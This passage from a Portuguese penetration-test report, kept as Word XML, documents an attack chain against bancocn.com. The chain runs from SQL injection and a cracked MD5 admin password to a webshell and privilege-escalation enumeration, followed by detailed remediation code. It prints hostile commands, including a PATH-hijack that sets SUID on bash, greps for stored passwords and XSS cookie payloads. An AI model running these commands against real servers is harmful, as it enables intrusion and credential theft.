      <w:bookmarkEnd w:id="4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Enumeração Realizada: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1. Verificar usuário atual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cmd=whoami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 www-data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2. Verificar grupos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cmd=groups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 www-data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3. Buscar binários com SUID bit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cmd=find / -perm -4000 -type f 2&gt;/dev/null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 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/usr/bin/passwd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/usr/bin/sudo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/usr/bin/gpasswd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/bin/mount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/bin/umount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[... outros binários ...]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4. Verificar versão do kernel (exploits conhecidos?)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cmd=uname -a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 Linux [hostname] 4.x.x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5. Verificar cron jobs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cmd=cat /etc/crontab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cmd=ls -la /etc/cron.*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6. Buscar arquivos world-writable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cmd=find /var/www -type f -perm -o+w 2&gt;/dev/null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7. Verificar configurações do Apache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cmd=cat /etc/apache2/apache2.conf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bh0egu39hzg9" w:id="48"/>
      <w:bookmarkEnd w:id="4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Vetores Potenciais de Escalação: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Exploits de Kernel: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Verificar versão do kernel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uname -a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Buscar exploits públicos para a versão identificada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Exemplos: DirtyCOW, eBPF vulnerabilities, etc.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Binários SUID Vulneráveis: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Identificar binários com SUID bit que podem ser explorados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find / -perm -4000 -type f 2&gt;/dev/null | grep -v "snap"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Cron Jobs com Permissões Inadequadas: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Verificar scripts executados pelo cron como root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ls -la /etc/cron.d/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ls -la /etc/cron.daily/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Configurações MySQL/MariaDB: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Verificar se MySQL roda como root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 aux | grep mysql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Verificar UDF (User Defined Functions) vulneráveis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5. Arquivos de Configuração com Senhas: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Buscar credenciais em arquivos de config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grep -r "password" /var/www/ 2&gt;/dev/null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grep -r "passwd" /etc/ 2&gt;/dev/null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bs0wscjpi6zh" w:id="49"/>
      <w:bookmarkEnd w:id="4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Técnica Observada - Manipulação de PATH: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 um script executado com privilégios elevados usar comandos sem caminho absoluto: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Exemplo: script /usr/local/bin/backup.sh executado como root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#!/bin/bash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tar -czf /backup/site.tar.gz /var/www/html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Exploração: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'#!/bin/bash' &gt; /tmp/tar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'chmod +s /bin/bash' &gt;&gt; /tmp/tar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chmod +x /tmp/tar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export PATH=/tmp:$PATH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Aguardar execução do script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IMPACTO:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Com acesso RCE como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www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, um atacante determinado poderia escalar privilégios para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root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> em questão de minutos ou horas, dependendo da configuração do servidor.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p3gclesf595" w:id="50"/>
      <w:bookmarkEnd w:id="5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VULNERABILIDADE #7: AUSÊNCIA DE WAF EFETIVO (MÉDIO) 🟡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Análise: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wafw00f http://www.bancocn.com/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Resultado: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[+] The site http://www.bancocn.com/ is behind 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Cloudflare (Cloudflare Inc.) WAF.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Problema:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apesar do Cloudflare estar presente, as regras de WAF não estão bloqueando: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SQL Injection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XSS (Reflected)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Tentativas de força bruta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Enumeração de diretórios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Upload de webshells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020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Execução remota de comandos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Bypass Realizado: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Tamper scripts do SQLMap funcionaram perfeitamente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--tamper=space2comment,between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XSS não foi filtrado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payload: '&lt;script&gt;alert(1)&lt;/script&gt;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RCE não foi detectado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/admin/uploads/phpinfo.php7?cmd=ls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lvw7a9gww23" w:id="51"/>
      <w:bookmarkEnd w:id="5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VULNERABILIDADE #8: INFORMATION DISCLOSURE (MÉDIO) 🟡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218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sy5dj28otaz" w:id="52"/>
      <w:bookmarkEnd w:id="5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8.1 Listagem de Diretórios Habilitada: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http://www.bancocn.com/classes/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http://www.bancocn.com/images/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http://www.bancocn.com/assets/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http://www.bancocn.com/admin/uploads/ ⚠️ CRÍTICO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Descoberta Crítica:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O diretório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/admin/uploads/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> está listável, permitindo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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Visualizar todos os arquivos enviados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Identificar webshells de outros atacantes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022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Mapear estrutura de uploads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http://www.bancocn.com/admin/uploads/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Index of /admin/uploads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[ICO] Name                              Last modified   Size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  ] 1490906279.jpg                    2025-XX-XX XX:XX  XXK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  ] dsc_0699-min.jpg                  2025-XX-XX XX:XX  XXK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  ] north-korea-science-technology.jpg 2025-XX-XX XX:XX XXK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  ] phpinfo.php7                      2025-XX-XX XX:XX  XXK ⚠️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4etyx0itwo6f" w:id="53"/>
      <w:bookmarkEnd w:id="5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8.2 Arquivos Sensíveis Acessíveis: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/classes/db.php (124 bytes)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Provavelmente contém credenciais do banco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/classes/auth.php (391 bytes)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Lógica de autenticação exposta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8qcsusnmnqo" w:id="54"/>
      <w:bookmarkEnd w:id="5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VULNERABILIDADE #9: CONFIGURAÇÕES INSEGURAS (MÉDIO) 🟡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236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27agwn5kqn92" w:id="55"/>
      <w:bookmarkEnd w:id="5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PHP Version Disclosure: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X-Powered-By: PHP/5.6.40-29+ubuntu18.04.1+deb.sury.org+1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Risco:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP 5.6.40 está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SEVERAMENTE desatualizado</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e possui múltiplas vulnerabilidades conhecidas (EOL desde 31/12/2018).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CVEs conhecidas para PHP 5.6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B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CVE-2019-11043 (Remote Code Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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CVE-2019-11042 (Buffer Overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023D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CVE-2019-11041 (Buffer Overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023E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e1g50wte7f2z" w:id="56"/>
      <w:bookmarkEnd w:id="5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Server Information Disclosure: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Server: cloudflare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Apache/2.4.29 (Ubuntu) Server at www.bancocn.com Port 80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mnl6uwxxs76m" w:id="57"/>
      <w:bookmarkEnd w:id="5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Falta de Headers de Segurança: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Missing Headers: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Content-Security-Policy (permite XSS)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X-Frame-Options (permite Clickjacking)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X-Content-Type-Options (permite MIME sniffing)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Strict-Transport-Security (sem HTTPS forçado)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xwlgm5i2rrs" w:id="58"/>
      <w:bookmarkEnd w:id="5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FASE 3: CADEIA DE EXPLORAÇÃO COMPLETA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4f6b1gtu5t" w:id="59"/>
      <w:bookmarkEnd w:id="5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Timeline do Ataque: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FASE 1: RECONHECIMENTO                                      │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[06/11 19:23] Início do mapeamento                         │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[06/11 19:30] Identificação de SQL Injection               │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[06/11 20:04] Análise de Security Headers (Grade F)        │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FASE 2: EXPLORAÇÃO SQL INJECTION                            │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[11/11 16:46] Primeira tentativa SQLMap                    │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[11/11 17:17] Exploração bem-sucedida com tamper scripts   │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[11/11 17:18] Dump da tabela 'users' completo              │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[11/11 17:23] Dump completo do database 'bancocn'          │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16:36] Identificação de colunas login/password      │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16:44] Hash MD5 quebrado: "senhafoda"               │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FASE 3: ACESSO ADMINISTRATIVO                               │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Login no painel administrativo               │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Mapeamento de funcionalidades                │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Identificação de função de upload            │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FASE 4: VULNERABILIDADE XSS                                 │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Descoberta de XSS em cat.php?id=             │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Teste: console.log("hello world")            │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Teste: alert(document.cookie)                │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Confirmação de cookie theft viável           │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FASE 5: FILE UPLOAD BYPASS                                  │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Análise da validação de upload               │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Criação de phpinfo.php7                      │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Upload bem-sucedido (bypass)                 │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Confirmação: phpinfo() executado             │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FASE 6: REMOTE CODE EXECUTION                               │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Modificação da webshell para RCE             │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Teste: cmd=ls                                │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Output: arquivos listados com sucesso        │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│ [12/11 XX:XX] Teste: cmd=whoami → www-data                 │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│ [12/11 XX:XX] Teste: cmd=pwd → /var/www/html/admin/uploads │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RCE CONFIRMADO - Controle total do servidor  │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FASE 7: PÓS-EXPLORAÇÃO                                      │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Enumeração do sistema operacional            │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Busca por binários SUID                      │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Identificação de vetores de escalação        │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[12/11 XX:XX] Análise de privilege escalation possível     │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a9zxto6n2jl" w:id="60"/>
      <w:bookmarkEnd w:id="6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Diagrama da Cadeia de Ataque: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[1] SQL Injection (cat.php)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↓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[2] Obtenção de Hash MD5 (users table)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↓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[3] Quebra de Senha (senhafoda)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↓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[4] Login Administrativo (/admin/)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↓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[5] File Upload Bypass (phpinfo.php7)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↓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[6] Remote Code Execution (cmd parameter)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↓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[7] Enumeração do Sistema (www-data user)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↓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[8] Privilege Escalation Possível (vetores identificados)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↓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[9] COMPROMETIMENTO TOTAL DO SERVIDOR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o6w9owwjgm2" w:id="61"/>
      <w:bookmarkEnd w:id="6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IMPACTO DAS VULNERABILIDADES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h8d4xv9zh94" w:id="62"/>
      <w:bookmarkEnd w:id="6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Matriz de Impacto:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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370"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1085"/>
        <w:gridCol w:w="1325"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2735"/>
            <w:gridCol w:w="1370"/>
            <w:gridCol w:w="1400"/>
            <w:gridCol w:w="108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Vulnerabilidade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Exploração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CVSS v3.1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SQL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🔴 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Fácil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Máximo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9.8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XSS Reflected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🔴 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Fácil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File Upload Bypass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🔴 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Máximo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9.1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Remote Code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🔴 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Máximo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Privilege Escalation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🟠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Difícil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Máximo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8.8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Auth Bypass (brute force)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🔴 Crítico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WAF Ineffective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🟡 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Information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🟡 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Fácil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5.3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Insecure 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🟡 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6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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m1q67wo9qdt" w:id="63"/>
      <w:bookmarkEnd w:id="6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Cenário de Ataque Real Completo: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CENÁRIO 1: ATAQUE DIRETO (SEM CREDENCIAIS)                  │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1. Atacante realiza SQL Injection em cat.php                │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2. Extrai credenciais admin (hash MD5)                      │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3. Quebra hash em minutos (senha fraca)                     │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4. Acessa painel administrativo                             │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5. Faz upload de webshell (bypass de validação)            │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6. Executa comandos arbitrários no servidor                 │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7. Enumera sistema para privilege escalation               │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8. Obtém acesso root (se vulnerabilidades presentes)        │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TEMPO ESTIMADO: 2-4 horas                                   │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NÍVEL DE HABILIDADE: Intermediário                          │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CENÁRIO 2: ATAQUE VIA PHISHING (XSS)                        │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1. Atacante cria payload XSS em cat.php                     │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2. Payload rouba cookies de sessão                          │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3. Envia link malicioso para administrador                  │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4. Admin clica no link (engenharia social)                  │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5. Cookie PHPSESSID enviado para servidor do atacante      │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6. Atacante usa session hijacking                           │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7. Acessa painel sem necessidade de senha                   │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8. Continua com upload de webshell e RCE                    │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TEMPO ESTIMADO: 1-2 horas (+ tempo de phishing)            │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NÍVEL DE HABILIDADE: Intermediário                          │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CENÁRIO 3: ATAQUE AUTOMATIZADO (SCRIPT KIDDIE)              │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1. Uso de ferramentas automatizadas (SQLMap, Metasploit)   │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2. Exploração SQL Injection automática                      │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3. Upload de webshell via scripts públicos                  │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4. Instalação de backdoor persistente                       │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5. Instalação de cryptominer/botnet                         │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                                                       │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TEMPO ESTIMADO: 30 minutos - 1 hora                        │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NÍVEL DE HABILIDADE: Baixo (script kiddie)                 │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d22965k1joz" w:id="64"/>
      <w:bookmarkEnd w:id="6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Impactos por Categoria:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002FD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l34n289xbbz0" w:id="65"/>
      <w:bookmarkEnd w:id="6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💰 Impacto Financeiro:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F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Perda de receita por indisponibilidade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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Custos de resposta a incidentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Multas regulatórias (LGPD - até R$ 50 milhões ou 2% do faturamento)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Custos de remediação e hardening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Possível ransomware (criptografia de dados)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Fraude financeira (manipulação de transações)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030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ESTIMATIVA: R$ 500.000 - R$ 5.000.000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000305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rux94cvojkfi" w:id="66"/>
      <w:bookmarkEnd w:id="6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📊 Impacto aos Dados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030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346 endereços IP de visitantes expostos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Credenciais administrativas comprometidas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Estrutura completa do banco de dados acessível</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Dados de clientes potencialmente expostos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Código-fonte da aplicação acessível</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030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Configurações do servidor expostas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000030C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zb85jpkhhp57" w:id="67"/>
      <w:bookmarkEnd w:id="6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⚖️ Impacto Legal (LGPD):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Art. 46 - Vazamento de dados pessoais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Multa: até 2% do faturamento (limitado a R$ 50 milhões)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Art. 48 - Comunicação à ANPD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Prazo: imediato após conhecimento do incidente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Art. 52 - Sanções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Advertência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Multa simples ou diária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Bloqueio dos dados pessoais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Eliminação dos dados pessoais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Suspensão parcial do banco de dados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Suspensão do exercício da atividade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Proibição parcial ou total do exercício de atividades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k568ltz1ktpd" w:id="68"/>
      <w:bookmarkEnd w:id="6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🎯 Impacto Reputacional:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031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Perda de confiança dos clientes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Exposição negativa na mídia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Perda de market share para concorrentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Dificuldade em atrair novos clientes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Impacto negativo na marca "Banco da Coreia do Norte"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322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RECUPERAÇÃO ESTIMADA: 12-24 meses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000323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34uztl7bfp5" w:id="69"/>
      <w:bookmarkEnd w:id="6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🖥️ Impacto Operacional:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000324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Comprometimento total do servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Necessidade de rebuild completo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Perda de dados se backup comprometido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Interrupção de serviços</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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Tempo de downtime para correções</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032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Investigação forense necessária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bqzsfr1vwh14" w:id="70"/>
      <w:bookmarkEnd w:id="7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RECOMENDAÇÕES DE CORREÇÃO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hlajhqsjkr0" w:id="71"/>
      <w:bookmarkEnd w:id="7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🔴 PRIORIDADE CRÍTICA (Implementar em 24-48h)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032D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wmdt90suv3vl" w:id="72"/>
      <w:bookmarkEnd w:id="7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1. SQL Injection em cat.php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Problema Identificado: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Código vulnerável (estimado):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$id = $_GET['id'];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$query = "SELECT * FROM categories WHERE id = $id";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$result = mysqli_query($conn, $query);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Correção Imediata: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Solução 1: Prepared Statements (PDO)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$id = $_GET['id'];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$stmt = $pdo-&gt;prepare("SELECT * FROM categories WHERE id = :id");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$stmt-&gt;bindParam(':id', $id, PDO::PARAM_INT);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$stmt-&gt;execute();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$result = $stmt-&gt;fetchAll();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Solução 2: Prepared Statements (MySQLi)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$id = $_GET['id'];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$stmt = $conn-&gt;prepare("SELECT * FROM categories WHERE id = ?");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$stmt-&gt;bind_param("i", $id);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$stmt-&gt;execute();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$result = $stmt-&gt;get_result();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Solução 3: Validação + Cast (temporário)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$id = (int)$_GET['id']; // Força conversão para inteiro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($id &lt;= 0) {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die("Invalid ID");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$query = "SELECT * FROM categories WHERE id = $id";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Implementar em TODOS os arquivos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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cat.php (CRÍTICO)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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show.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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all.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034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Qualquer arquivo que use queries SQL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750gla6zhb8" w:id="73"/>
      <w:bookmarkEnd w:id="7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2. XSS Reflected em cat.php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Problema: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Código vulnerável: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"Categoria ID: " . $_GET['id'];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Correção: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Solução 1: htmlspecialchars (básico)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"Categoria ID: " . htmlspecialchars($_GET['id'], ENT_QUOTES, 'UTF-8');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Solução 2: filter_var (recomendado)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$id = filter_var($_GET['id'], FILTER_SANITIZE_NUMBER_INT);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"Categoria ID: " . htmlspecialchars($id, ENT_QUOTES, 'UTF-8');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Solução 3: Validação rigorosa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function sanitize_output($string) {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return htmlspecialchars($string, ENT_QUOTES | ENT_HTML5, 'UTF-8');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"Categoria ID: " . sanitize_output($_GET['id']);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Implementar Content Security Policy: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.htaccess ou header PHP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Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;"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ede6d4y2okxt" w:id="74"/>
      <w:bookmarkEnd w:id="7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3. File Upload - Validação Completa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Correção Completa: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&lt;?php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function secure_file_upload($file) {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1. Verificar se arquivo foi enviado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(!isset($file) || $file['error'] !== UPLOAD_ERR_OK) {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die("Erro no upload");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2. Whitelist de extensões (APENAS imagens)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$allowed_extensions = ['jpg', 'jpeg', 'png', 'gif'];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$filename = basename($file['name']);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$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));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(!in_array($ext, $allowed_extensions)) {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die("Extensão não permitida");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3. Verificar MIME type real (não confiar no cliente)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$finfo = finfo_open(FILEINFO_MIME_TYPE);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$mime = finfo_file($finfo, $file['tmp_name']);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finfo_close($finfo);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$allowed_mimes = [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'image/jpeg',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'image/png',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'image/gif'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];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(!in_array($mime, $allowed_mimes)) {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die("Tipo de arquivo inválido");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4. Verificar conteúdo da imagem (reprocessar)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(!getimagesize($file['tmp_name'])) {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die("Arquivo não é uma imagem válida");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5. Limitar tamanho (5MB)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($file['size'] &gt; 5 * 1024 * 1024) {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die("Arquivo muito grande");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6. Gerar nome aleatório (prevenir path traversal)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$new_filename = bin2hex(random_bytes(16)) . '.' . $ext;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7. Definir diretório seguro (fora do webroot se possível)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$upload_dir = '/var/www/uploads/'; // Fora de /var/www/html/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8. Mover arquivo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$destination = $upload_dir . $new_filename;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(!move_uploaded_file($file['tmp_name'], $destination)) {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die("Erro ao salvar arquivo");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9. Remover permissões de execução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chmod($destination, 0644);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10. Log do upload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error_log("Upload: " . $new_filename . " by " . $_SESSION['user']);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return $new_filename;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Uso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($_FILES['upload']) {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$filename = secure_file_upload($_FILES['upload']);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echo "Arquivo salvo: " . htmlspecialchars($filename);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?&gt;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Configuração Apache adicional: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.htaccess no diretório de uploads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&lt;FilesMatch "\.php$"&gt;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Order Allow,Deny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Deny from all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&lt;/FilesMatch&gt;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Desabilitar execução de scripts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Options -ExecCGI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AddHandler cgi-script .php .pl .py .jsp .asp .sh .cgi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rd15minivuh8" w:id="75"/>
      <w:bookmarkEnd w:id="7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4. Remover Webshell Imediatamente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Ação Imediata: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1. Localizar e remover webshell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rm /var/www/html/admin/uploads/phpinfo.php7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2. Verificar outros arquivos suspeitos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find /var/www/html -name "*.php*" -type f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find /var/www/html -name "*.phtml" -type f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3. Buscar por shells conhecidas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grep -r "system\|exec\|shell_exec\|passthru" /var/www/html --include="*.php"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4. Verificar permissões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find /var/www/html -type f -executable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5. Restaurar de backup limpo (se disponível)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Implementar monitoramento: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Instalar aide (Advanced Intrusion Detection Environment)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apt-get install aide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aide --init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aide --check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Ou usar inotify para monitorar alterações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apt-get install inotify-tools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inotifywait -m -r -e create,modify /var/www/html/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flwd0xt4yhdx" w:id="76"/>
      <w:bookmarkEnd w:id="76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5. Corrigir Armazenamento de Senhas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Problema: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Hash MD5 sem salt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password: 7b71be0e85318117d2e514ce2a2e222c (MD5 de "senhafoda")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Correção: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1. Gerar novo hash seguro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&lt;?php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$password = "nova_senha_forte_123!@#";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$hash = password_hash($password, PASSWORD_BCRYPT, ['cost' =&gt; 12]);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Output: $2y$12$...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2. Atualizar banco de dados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ALTER TABLE users MODIFY password VARCHAR(255);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$stmt = $pdo-&gt;prepare("UPDATE users SET password = ? WHERE id = 1");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$stmt-&gt;execute([$hash]);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3. Atualizar código de autenticação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Antigo (INSEGURO):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(md5($input_password) === $db_password) {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login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Novo (SEGURO):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(password_verify($input_password, $db_password)) {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login correto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Rehash se necessário (atualizar algoritmo)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(password_needs_rehash($db_password, PASSWORD_BCRYPT)) {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$new_hash = password_hash($input_password, PASSWORD_BCRYPT);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// Atualizar no banco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 else {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login incorreto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?&gt;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8ckn771hz2az" w:id="77"/>
      <w:bookmarkEnd w:id="7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6. Implementar Rate Limiting no Login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Solução via Fail2Ban (recomendado):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Instalar fail2ban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apt-get install fail2ban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Criar filtro /etc/fail2ban/filter.d/apache-auth.conf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[Definition]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failregex = ^&lt;HOST&gt; .* "POST /admin/login.php.*" 401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ignoreregex =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Configurar jail /etc/fail2ban/jail.local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[apache-auth]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enabled = true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port = http,https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filter = apache-auth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logpath = /var/log/apache2/access.log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maxretry = 5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bantime = 3600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findtime = 600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Reiniciar fail2ban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systemctl restart fail2ban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6f9khhq3bnyu" w:id="78"/>
